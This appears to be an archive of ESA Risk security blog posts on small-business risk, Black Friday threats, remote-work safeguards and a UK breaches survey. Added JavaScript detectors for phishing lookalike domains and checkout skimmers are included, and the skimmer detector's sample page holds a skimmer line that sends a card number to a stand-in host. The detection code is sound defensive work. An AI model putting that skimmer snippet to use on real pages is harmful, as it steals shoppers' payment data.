Though the rewards of targeting sizeable organisations are greater if successful, smaller firms are also at risk.

Cyber threats don’t discriminate by company size. In fact, smaller businesses are often seen as softer targets by cybercriminals because they assume security might not be as robust.

One of the biggest challenges companies face now comes with the interconnectedness of modern supply chains. Cyber criminals can exploit weaknesses in these supply chains to compromise multiple entities simultaneously, meaning the security of every link in the chain becomes crucial, requiring strict vetting processes and a collaborative approach.

Reducing your risks of a cyber attack

To reduce risk, companies need to implement multiple layers of security. Cyber security is not a one-size-fits-all solution. In order to create a robust defence, you need a defence-in-depth strategy, including firewalls, antivirus software, intrusion detection systems and regular security audits. This multifaceted approach ensures that vulnerabilities are addressed at various levels: rather than 'divide and conquer', think 'divide and defend'. The challenge lies both in trying to prevent these attacks and in devising effective recovery strategies should your network and data be targeted or compromised.

While emphasis is often placed on the implementation of robust technology, cyber threats can also be largely mitigated through training, education and awareness. A proactive approach to cyber security will always be the best way to minimise your company’s susceptibility to threats from cyber criminals.

Cyber security support from ESA Risk

If you need advice or support on anything cyber security-related, contact Ben Brown, Cyber Security Consultant at ben.brown@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

Cyber security concerns continue to rise among physical security professionals

This article was originally published by IFSEC Insider.

Based on insights from over 5,500 physical security leaders globally, the research showed that while organisations are putting in place new processes to protect themselves, the level of concern about potential cyber threats continues to increase.

Close to a third (31%) of end-user respondents indicated that their organisation was targeted by cyber threat actors in 2023. Some sectors were far more affected than others: 73% of respondents in the intelligence and national security sector and 46% in the banking and finance sector said they were the victims of cyber attacks, compared with 21% in the retail sector.

In August, the British perimeter security company Zaun Ltd was breached by the LockBit group. Despite accessing only a small fraction of the company's internal network, the attackers appear to have leaked sensitive documents relating to the physical security of UK Ministry of Defence sites.

A top challenge faced

Cybersecurity vulnerabilities were identified by 36% of end-user respondents as a top challenge facing their organisations in 2023. In the healthcare sector, cybersecurity vulnerabilities were identified by a higher percentage of respondents than any other challenge (43%).

Organisations are, however, being more proactive with 42% of end-user respondents indicating that their organisations are deploying cybersecurity-related tools in their physical security environments. This is a significant increase compared to last year when only 27% said they had put in place processes to protect themselves.

“It is reassuring to see growing awareness of the cybersecurity of physical security systems,” Mathieu Chevalier, Principal Security Architect at Genetec said: “As more organisations look to implement enhanced cybersecurity measures, they need to look for manufacturers who are committed to cybersecurity and building tools that help them streamline the maintenance and updates of their systems.”

Cyber security support from ESA Risk

If you need advice or support on anything cyber security-related, contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

Black Friday 2023: Stay cyber-safe

For many, Black Friday marks the official start to the Christmas shopping season and, excitingly, many retailers announce time-limited sales that promise huge savings to consumers. But it’s also the prime time for cyber criminals to cash in, too.

Some digital threats to watch out for on Black Friday 2023

Phishing attacks

While consumers rush to grab themselves a bargain, they may get caught out by a phishing scam. Phishing links commonly lead to fake login pages, prompting victims to authenticate themselves on their web account. For instance, victims may think they are logging into their favourite retailer account, when, really, they are handing their username and password over to an attacker, who can use it to their advantage later. Although this affects users directly, it also negatively impacts the retailer's reputation, which can be difficult to recover.

PayPal – a platform used to handle payments by many online retailers – is one of the most commonly mimicked websites. It is not only the retailer’s site that you need to be able to trust, but third-party applications used by that site, as well.

Malware  

Malware (as the portmanteau suggests) refers to any malicious software designed to harm a computer system by tracking user activity, hijacking functionality or stealing, deleting or encrypting data. Most malware enters your systems via email (widely reported at more than 90%). Statista reports that there were 5.5 billion malware attacks last year.

Malware is constantly proliferating and changing. AV Test describes how the total amount of malware has grown every year since 2008 (their first data point), with a vast amount of new malware created in the last five years.

This should be seen as a high-risk Black Friday cyber threat.

Formjacking

Formjacking (the web-skimming technique associated with the 'Magecart' groups) is where malicious code is injected into the checkout pages of a website, often going undetected for a long time. The injected script reads personal and payment details as shoppers type them into the legitimate form and sends them to the criminals.

Ransomware  

Ransomware encrypts files so that they are inaccessible to their owner. The cyber criminal then demands a ransom payment in return for releasing the locked files. Ransomware is typically delivered through compromised online adverts ('malvertising'), phishing emails and exploit kits. This has consequences for consumers and retailers/businesses alike.

How can you reduce the risk of cyber threats on Black Friday 2023? 

The above attacks take place daily and are not specific to the holiday season or large events like Black Friday, but the volume and frequency of these attacks significantly increase during these times, as more consumers make purchases online.

Being aware of these threats is a step closer to preventing cyber attacks on Black Friday and during the 2023 holiday season to come. Businesses should balance their investments in security awareness training for employees and putting robust security measures in place that can help to scan their systems for suspicious activity. Similarly, consumers need to be better educated and made aware of potential threats.

If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Reach out to us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form to find out more.

Black Friday 2022: Stay cyber-safe

For many, Black Friday 2022 marks the official start to the Christmas shopping season and, excitingly, many retailers announce time-limited sales that promise huge savings to consumers. But it’s also the prime time for cyber criminals to cash in, too.

Some digital threats to watch out for on Black Friday 2022

Phishing attacks

While consumers rush to grab themselves a bargain, they may get caught out by a phishing scam. Phishing links commonly lead to fake login pages, prompting victims to authenticate themselves on their web account. For instance, victims may think they are logging into their favourite retailer account, when, really, they are handing their username and password over to an attacker, who can use it to their advantage later. Although this affects users directly, it also negatively impacts the retailer's reputation, which can be difficult to recover.

PayPal – a platform used to handle payments by many online retailers – is one of the most commonly mimicked brands in phishing. It is not only the retailer’s own site that you need to be able to trust, but also the third-party payment and login providers that site relies on.
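The lookalike hostnames that phishing links rely on (a digit for a letter, the brand name placed as a subdomain of an unrelated domain, or a Unicode character that renders like a Latin one) can be caught mechanically. The following is an added example, not code from the original article or from ESA Risk: a link-classification routine of the kind a mail gateway or browser extension applies before a user clicks. The brand list, the short public-suffix list and the sample URLs are constructed for illustration; a real deployment would use the organisation’s own brand list and the full Public Suffix List.

```javascript
// Added example, not from the original article: a lookalike-domain check of the kind
// a mail gateway or browser extension applies to links before a user clicks them.
// The brand list, suffix list and sample URLs are constructed for illustration.
const KNOWN_BRANDS = ['paypal.com', 'amazon.co.uk', 'argos.co.uk'];

// Public suffixes with a second level, so that "co.uk" counts as part of the suffix.
// A real implementation would use the full Public Suffix List.
const SECOND_LEVEL_SUFFIXES = new Set(['co.uk', 'org.uk', 'ac.uk', 'gov.uk', 'com.au']);

// Characters attackers substitute for letters they resemble ("paypa1", "arnazon").
const HOMOGLYPHS = [['rn', 'm'], ['vv', 'w'], ['0', 'o'], ['1', 'l'], ['3', 'e'], ['5', 's']];

function normaliseLabel(label) {
  let out = label.toLowerCase();
  for (const [glyph, letter] of HOMOGLYPHS) out = out.split(glyph).join(letter);
  return out;
}

// Levenshtein distance (single-row dynamic programme) to catch one-character typosquats.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diagonal = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(row[j] + 1, row[j - 1] + 1, diagonal + (a[i - 1] === b[j - 1] ? 0 : 1));
      diagonal = above;
    }
  }
  return row[b.length];
}

// The registrable domain is the part a brand actually owns: the last two labels,
// or three when the suffix itself has two levels (amazon.co.uk).
function registrableDomain(host) {
  const labels = host.split('.');
  const lastTwo = labels.slice(-2).join('.');
  return SECOND_LEVEL_SUFFIXES.has(lastTwo) ? labels.slice(-3).join('.') : lastTwo;
}

function classifyUrl(url) {
  let host;
  try {
    host = new URL(url).hostname.toLowerCase();
  } catch {
    return { verdict: 'invalid', reason: 'not a parseable URL' };
  }
  // Internationalised hostnames are serialised as punycode; Unicode lookalikes hide here.
  if (host.split('.').some((label) => label.startsWith('xn--'))) {
    return { verdict: 'suspicious', reason: 'punycode (IDN) hostname', host };
  }
  const domain = registrableDomain(host);
  if (KNOWN_BRANDS.includes(domain)) {
    return { verdict: 'legitimate', brand: domain, host };
  }
  const domainLabel = domain.split('.')[0];
  const subdomainLabels = host.split('.').slice(0, -domain.split('.').length);
  for (const brand of KNOWN_BRANDS) {
    const brandLabel = brand.split('.')[0];
    // paypal.com.account-verify.example: the brand is only a subdomain of something else.
    if (subdomainLabels.includes(brandLabel)) {
      return { verdict: 'suspicious', reason: `brand "${brandLabel}" used as a subdomain of ${domain}`, host };
    }
    // paypa1.com, arnazon.co.uk, paypal-login.com: the owned domain imitates the brand.
    const normalised = normaliseLabel(domainLabel);
    if (editDistance(normalised, brandLabel) <= 1 || normalised.includes(brandLabel)) {
      return { verdict: 'suspicious', reason: `"${domain}" imitates ${brand}`, host };
    }
  }
  return { verdict: 'unknown', domain, host };
}
```

The `includes` test catches `paypal-login.com` but will also flag an unrelated domain that happens to contain a short brand name, so in practice the brand list is kept to distinctive names and an ‘unknown’ verdict is treated as a prompt to check the certificate and the address bar, not as a pass.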

Malware  

Malware (a portmanteau of ‘malicious software’) refers to any software designed to harm a computer system, whether by tracking user activity, hijacking functionality, or stealing, deleting or encrypting data. Most malware enters systems via email (widely reported at more than 90% of infections). Statista reports 2.8 billion malware attacks in the first six months of 2022 – more than half the number recorded for the whole of 2021.

Malware is constantly proliferating and changing. AV Test reports that the total volume of known malware has grown every year since 2008 (its first data point), and that 2021 saw the largest influx of new malware samples of any year on record.

This should be seen as a high-risk Black Friday cyber threat.

Formjacking

Formjacking is the technique behind the ‘Magecart’ attacks: malicious JavaScript is injected into a website’s checkout pages, often through a compromised third-party script or plugin, and silently copies the personal and payment details shoppers type into the form to a server the attacker controls. Because the legitimate transaction still completes, the skimmer can go undetected for months.
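A retailer can look for the traces a skimmer leaves before it costs them months of card data. The following is an added example, not code from the original article or from ESA Risk: a static triage of a checkout page that flags third-party scripts loaded without Subresource Integrity and inline scripts that both read card fields and make a network request, together with a check of the page’s Content-Security-Policy header. The shop origin, the sample HTML (including its placeholder integrity digest) and the CSP strings are constructed for illustration.

```javascript
// Added example, not from the original article: a static triage of a checkout page for
// the traces a formjacking (Magecart-style) skimmer leaves, plus a check of the page's
// Content-Security-Policy. The page origin, sample HTML and CSP strings are constructed.
const FIRST_PARTY_HOST = 'shop.example';

// Field names a skimmer must read, and the calls it uses to send them away.
const PAYMENT_FIELDS = /card[-_ ]?number|\bcvv\b|\bcvc\b|expiry|\bpan\b/i;
const EXFIL_CALLS = /\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=/;

function scanCheckoutHtml(html) {
  const findings = [];
  const scriptTag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let match;
  while ((match = scriptTag.exec(html)) !== null) {
    const [, attributes, body] = match;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attributes);
    if (src) {
      // External script: anything not served by the shop itself should be pinned with SRI,
      // otherwise a compromise of that third party silently changes what runs at checkout.
      let host = null;
      try { host = new URL(src[1], `https://${FIRST_PARTY_HOST}/`).hostname; } catch { /* unparseable src: skip */ }
      if (host && host !== FIRST_PARTY_HOST && !/\bintegrity\s*=/i.test(attributes)) {
        findings.push({ kind: 'third-party-script-without-sri', src: src[1] });
      }
    } else if (PAYMENT_FIELDS.test(body) && EXFIL_CALLS.test(body)) {
      // Inline script that both touches card fields and makes a network request.
      findings.push({ kind: 'inline-script-reads-card-data-and-sends', snippet: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// A CSP that restricts script sources, connections and form targets limits what an injected
// skimmer can do even after it has landed on the page. connect-src falls back to default-src;
// form-action does not.
function checkCsp(headerValue) {
  const directives = {};
  for (const part of headerValue.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) directives[name] = values;
  }
  const issues = [];
  const scriptSrc = directives['script-src'] || directives['default-src'];
  if (!scriptSrc) issues.push('no script-src or default-src');
  else if (scriptSrc.includes("'unsafe-inline'") || scriptSrc.includes('*')) issues.push("script-src allows 'unsafe-inline' or any origin");
  if (!directives['connect-src'] && !directives['default-src']) issues.push('no connect-src: fetch/XHR may go anywhere');
  if (!directives['form-action']) issues.push('no form-action: the form may be posted to any origin');
  return issues;
}

// Constructed sample page: one first-party script, one pinned CDN script, one unpinned CDN
// script, and an inline handler that copies the card number out via an image request.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout"><input name="cardNumber"><input name="cvv"></form>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-PlaceholderDigest" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    var pan = document.querySelector('[name=cardNumber]').value;
    new Image().src = 'https://stats.example.org/p?d=' + btoa(pan);
  });
</script>
</body></html>`;

const SAMPLE_CSP_WEAK = "default-src 'self' 'unsafe-inline'";
const SAMPLE_CSP_STRONG = "default-src 'self'; script-src 'self' https://cdn.example.net; connect-src 'self'; form-action 'self'";
```

Regex-based scanning of the HTML is a triage step for a build pipeline or a periodic crawl, not a substitute for runtime monitoring: a skimmer loaded from a pinned third party after the pin was updated, or one hidden inside an obfuscated bundle, will not trigger these patterns, which is why the CSP check matters as a second layer.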

Ransomware  

Ransomware encrypts files so that their owner can no longer access them; the criminal then demands a ransom payment for the decryption key, and many groups now also steal data before encrypting it and threaten to publish it if the ransom is not paid. It is delivered through compromised advertising networks (‘malvertising’), phishing emails and exploit kits, and an incident at a retailer during peak trading affects both the business and its customers.

Not being prepared enough for cyber threats is a threat

A staggering 3 in 4 IT leaders expressed a lack of confidence in their company’s IT security posture and saw room for improvement. Despite this, only 57% of companies conducted a data security risk assessment in 2020. Businesses need to step up their cyber security efforts to reduce these risks and limit the impact of an attack.

How can you reduce the risk of cyber threats on Black Friday 2022? 

The above attacks take place daily and are not specific to the holiday season or large events like Black Friday, but the volume and frequency of these attacks significantly increase during these times, as more consumers make purchases online.

Being aware of these threats is a step towards preventing cyber attacks on Black Friday 2022 and during the holiday season to come. Businesses should balance investment in security awareness training for employees with robust technical controls that monitor their systems for suspicious activity. Consumers, likewise, need to be better informed about the threats they face.

If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Reach out to us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form to find out more.


How to safeguard company data when employees work remotely

By guest author Sharon McDougall of Scotland Debt Solutions.

Without safeguards in place, companies face the prospect of having information stolen by hackers or being held to ransom for their most sensitive data. So what can businesses do to protect themselves when employees work from home or from another remote location?

Create a cyber security policy

A strong cyber security policy explains the risks of a data breach, and requiring all employees to read and sign it gives them greater ownership of the issue.

It should set out the protocols remote workers must follow and the resources available to help them comply, so that everyone fully understands what is expected of them.

Cyber security training

Regular training events keep staff up-to-date on current cyber security issues, whilst also providing them with the awareness and knowledge to recognise and deal with non-standard occurrences when they’re working remotely.

Regular training events help employees to understand the importance of cyber security for their employer, and crucially, how to prevent a data security breach by proactively keeping hackers at bay.

Use a VPN

Connecting to an unsecured Wi-Fi network while working remotely is one common situation in which company data is put at risk. A Virtual Private Network (VPN) encrypts traffic between the employee’s device and the company’s VPN gateway, so that nobody else on the local network can read or tamper with it. It does not protect a device that is already compromised, so it complements rather than replaces the other controls below.

Although convenient, public Wi-Fi networks in locations such as coffee shops and restaurants are known to be risky from a security point-of-view, and particularly dangerous for businesses holding sensitive data.

Use password management software

Strong, unique passwords for every account are fundamental in the fight against hackers. Current NCSC guidance is to change a password when there is reason to believe it has been compromised rather than on a fixed schedule, because forced regular changes push people towards weaker, predictable patterns. Password management software generates and stores such passwords, simplifies employee logins and can be used across different types of device.

Email, banking and social media logins gain another layer of protection against breach, and because a password manager only offers to fill a credential on the site it was saved for, it also gives employees a useful warning when a login page is not the one they think it is.

Multifactor authentication

Multifactor authentication adds a second proof of identity beyond the password. This might be a one-time code from an authenticator app, a hardware security key, a text message containing a unique code or a confirmation phone call. Not all factors are equal: codes sent by SMS or voice call can be intercepted or obtained through SIM-swap fraud, and a security question is just another piece of knowledge an attacker can research, so app-based codes, push approvals and hardware keys are preferable where the service supports them.

For organisations or environments that are at particularly high risk, biometric data can be used to bolster data security. This might involve facial or voice recognition, or fingerprint scanning.

Back up files and create restore points regularly

Cloud storage gives employees a central location to upload files securely, and regular backups mean a business can restore its data rather than pay a ransom. Backups only help if the attacker cannot reach and encrypt them too, so keep at least one copy offline or in immutable storage, and test restoring from it.

Use antivirus, anti-malware, and a firewall on all devices

Anti-malware and antivirus software and a firewall should be installed on every device used by remote workers. All software, not just the security tools, must be kept up to date so that known vulnerabilities are patched and files and emails can be reliably scanned.

Working remotely with anti-malware constantly running in the background on all work devices further protects the company from malicious software, and can quickly detect and remove it as necessary.

If a company decides to ban the use of personal devices for work, it should make this part of its formal cyber security policy, particularly if it believes it is at high risk of a security breach.

A multi-layered approach safeguards commercial data and protects businesses from unrelenting attempts by cyber criminals to hack their information, but awareness and a clear understanding of the issues is the first step in thwarting their plans.

Remote worker cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber-secure, including remote worker cyber security, please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.


Boost cyber standards now, urges government

The UK government is encouraging businesses and charities to strengthen their cyber security, in the light of the Cyber Security Breaches Survey 2022 report commissioned by the Department for Digital, Culture, Media and Sport (DCMS).

Based on a survey conducted by Ipsos MORI between October 2021 and January 2022, the report shows that 39% of businesses and 30% of charities experienced cyber attacks or cyber security breaches in the preceding 12 months.

While these numbers are in line with 2021 levels, the frequency of attacks is increasing. Of those suffering attacks, 31% of businesses and a quarter of charities “said they now experience breaches or attacks at least once a week.”

“It is vital that every organisation take cyber security seriously as more and more business is done online and we live in a time of increasing cyber risk.

No matter how big or small your organisation is, you need to take steps to improve digital resilience now…”

Cyber Minister Julia Lopez

The report was ordered as part of the government’s National Cyber Strategy, which aims to protect the UK from cyber threats “by investing in cyber skills, expanding the country’s offensive and defensive cyber capabilities, and prioritising cyber security in the workplace, boardrooms and digital supply chains.”

Other figures from the survey are more positive, with 82% of senior managers in UK businesses listing the priority level of cyber security as ‘very high’ or ‘fairly high’, compared to 77% in the 2021 survey. This represents “the highest figure seen in any year of the cyber security breaches survey.”

DCMS point out that this increase may be due to the recent “wave of high-profile attacks” and the “increased attention on the cyber security of supply chains and digital services.”

The department is directing organisations to various resources for help, including:

One area that deserves particular attention is supply chain threat management. According to the report, just “13% of businesses reviewed the risks posed by immediate suppliers.”

Get help from ESA Risk

For further cyber security advice and support implementing recommendations in the government’s resources, please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

We work to the pillars of training, education and awareness, and provide a range of services including consulting, cyber security courses and practical exercises such as cyber war games.
